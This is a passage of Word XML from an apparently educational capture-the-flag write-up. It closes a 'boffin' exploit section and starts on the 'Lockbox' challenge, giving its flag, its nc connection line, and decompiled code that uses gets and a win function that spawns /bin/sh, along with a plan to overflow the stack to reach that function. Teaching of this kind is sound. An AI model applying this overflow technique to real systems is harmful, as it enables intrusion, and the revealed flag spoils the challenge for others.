            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="274629EE" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>$ ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49C35A50" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6DE0C684" w14:textId="666C9A82" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>flag.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="433E4655" w14:textId="40A2E91B" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Remote Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0198D6" w14:textId="20F493A0" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>All of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the code used to debug and exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C27BB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>boffin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is available in </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Appendix_C:_Boffin" w:history="1">
        <w:r w:rsidRPr="009C27BB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>App</w:t>
        </w:r>
        <w:r w:rsidRPr="009C27BB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>e</w:t>
        </w:r>
        <w:r w:rsidRPr="009C27BB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ndix C</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D91034" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRPr="009F3B92" w:rsidRDefault="009C27BB" w:rsidP="00555F5B"/>
    <w:p w14:paraId="42779604" w14:textId="77777777" w:rsidR="009F3B92" w:rsidRDefault="009F3B92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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9E80BB" w14:textId="1FBD767E" w:rsidR="00646037" w:rsidRPr="001215EC" w:rsidRDefault="00DB49B6" w:rsidP="000F56D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc159948658"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Lockbox</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="52BDA041" w14:textId="50FF434C" w:rsidR="00DB49B6" w:rsidRPr="00530A29" w:rsidRDefault="00646037" w:rsidP="00DB49B6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc159948659"/>
      <w:r w:rsidRPr="000F56D3">
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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461"/>
        <w:gridCol w:w="1234"/>
        <w:gridCol w:w="6655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB49B6" w:rsidRPr="005264D0" w14:paraId="25F00A16" w14:textId="77777777" w:rsidTr="00DF5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3"/>
          </w:tcPr>
          <w:p w14:paraId="4FB9CCBB" w14:textId="0C77366D" w:rsidR="00DB49B6" w:rsidRPr="005264D0" w:rsidRDefault="00DB49B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Lockbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB49B6" w:rsidRPr="005264D0" w14:paraId="054E34D4" w14:textId="77777777" w:rsidTr="00DF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1" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D5672" w:themeFill="accent1" w:themeFillShade="80"/>
          </w:tcPr>
          <w:p w14:paraId="04BFB3E7" w14:textId="3E15EE31" w:rsidR="00DB49B6" w:rsidRPr="00DA733E" w:rsidRDefault="00DB49B6" w:rsidP="00DF5A5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200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Points</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="49656A74" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRPr="00EE0A5C" w:rsidRDefault="00DB49B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Flag Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="52B1AD32" w14:textId="28D3854A" w:rsidR="00DB49B6" w:rsidRPr="005264D0" w:rsidRDefault="009F3B92" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DB49B6">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>flag{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB49B6">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Wh0_n33d5_A_k33y_wen_U_h4v3_a_B0F}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB49B6" w:rsidRPr="005264D0" w14:paraId="758C9F54" w14:textId="77777777" w:rsidTr="00DF5A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244D5E71" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRPr="005264D0" w:rsidRDefault="00DB49B6" w:rsidP="00DF5A55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472CDC15" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRPr="00EE0A5C" w:rsidRDefault="00DB49B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Location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1F03F2F7" w14:textId="5779DE22" w:rsidR="00DB49B6" w:rsidRPr="005264D0" w:rsidRDefault="00DB49B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DB49B6">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DB49B6">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> offsec-chalbroker.osiris.cyber.nyu.edu 1336</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB49B6" w:rsidRPr="005264D0" w14:paraId="2EB19FA2" w14:textId="77777777" w:rsidTr="00DF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2EC96329" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRPr="005264D0" w:rsidRDefault="00DB49B6" w:rsidP="00DF5A55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shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7EEDE94B" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRPr="00EE0A5C" w:rsidRDefault="00DB49B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Lore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="081BD471" w14:textId="2712EF38" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DF5A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ffer Overflows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB49B6" w:rsidRPr="005264D0" w14:paraId="13F30DD7" w14:textId="77777777" w:rsidTr="00DF5A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6F45E69C" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRPr="005264D0" w:rsidRDefault="00DB49B6" w:rsidP="00DF5A55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67ACE9ED" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRPr="00EE0A5C" w:rsidRDefault="00DB49B6" w:rsidP="00DF5A55">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Filenam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6F9721A8" w14:textId="1B06D9BC" w:rsidR="00DB49B6" w:rsidRDefault="009F3B92" w:rsidP="00DF5A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kbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58832ACD" w14:textId="19992A9B" w:rsidR="00646037" w:rsidRDefault="00646037" w:rsidP="00DB49B6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc159948660"/>
      <w:r w:rsidRPr="00840BBB">
        <w:t>Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4068F009" w14:textId="2629BEE5" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">On the first run, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> asked for a secret combination before crashing due to a segmentation fa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9B6" w14:paraId="1679E5BD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0A3CCA8D" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6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5933404A" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>$ .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">/lockbox  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="202E986D" w14:textId="055B5D40" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>I've locked my shell in a lockbox, you'll never get it now!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="369A3F0D" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>But give it your best try, what's the combination?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5671AB11" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61BC80BE" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>1337</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DC33FF9" w14:textId="17A3E380" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>zsh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">: segmentation </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>fault  .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/lockbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24467308" w14:textId="1D15191F" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>First Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB7B04E" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method, shown below after </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decompilation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, contains </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the functionality used during the first run. The code uses the insecure C library call </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to read in the user-entered value, although it is not immediately clear how the program uses that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9B6" w14:paraId="067DFEFF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1604F809" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>undefined8 main(void)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01528D57" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5596D604" w14:textId="05C5D257" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="169D4CF2" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fflush</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>stdout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2B9D8C33" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6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>"I\'ve locked my shell in a lockbox, you\'ll never get it now!\n");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5618416A" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6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>"But give it your best try, what\'s the combination?\n&gt; ");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B9264E2" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  gets(guess</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3A352917" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  *</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_38 = local_30;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24761BEB" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  return </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>0;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="523CEDDC" w14:textId="6219C190" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78E52A8D" w14:textId="5499A7A5" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Main Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9E666D" w14:textId="122D0C09" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">While looking at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function name</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stood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9B6" w14:paraId="2D4C9799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4858D4BD" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>void win(void)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E62F3A" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23AE925F" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  if (key == -0x25224f23) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B32193B" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>mystring._</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>0_8_ = 0x68732f6e69622f;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BFEDAA7" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B171A01" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  system(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mystring</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="104D49F8" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>return;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="12499E5A" w14:textId="001B6C04" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25EE81F4" w14:textId="42592394" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Win</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E380C63" w14:textId="569E0772" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">After checking </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value, the function uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> call to run a command stored in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>mystring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. If the key matches the expected value, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>mystring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is set to </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>, giving the user a shell on the machine running</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F13774" w14:textId="357ABCC6" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Unfortunately, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does not call the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function during regular operation. Ultimately, the goal is to call </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by ensuring that its address is at the top of the stack so that it is called when </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB49B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns.</w:t>
      </w:r>
    </w:p>
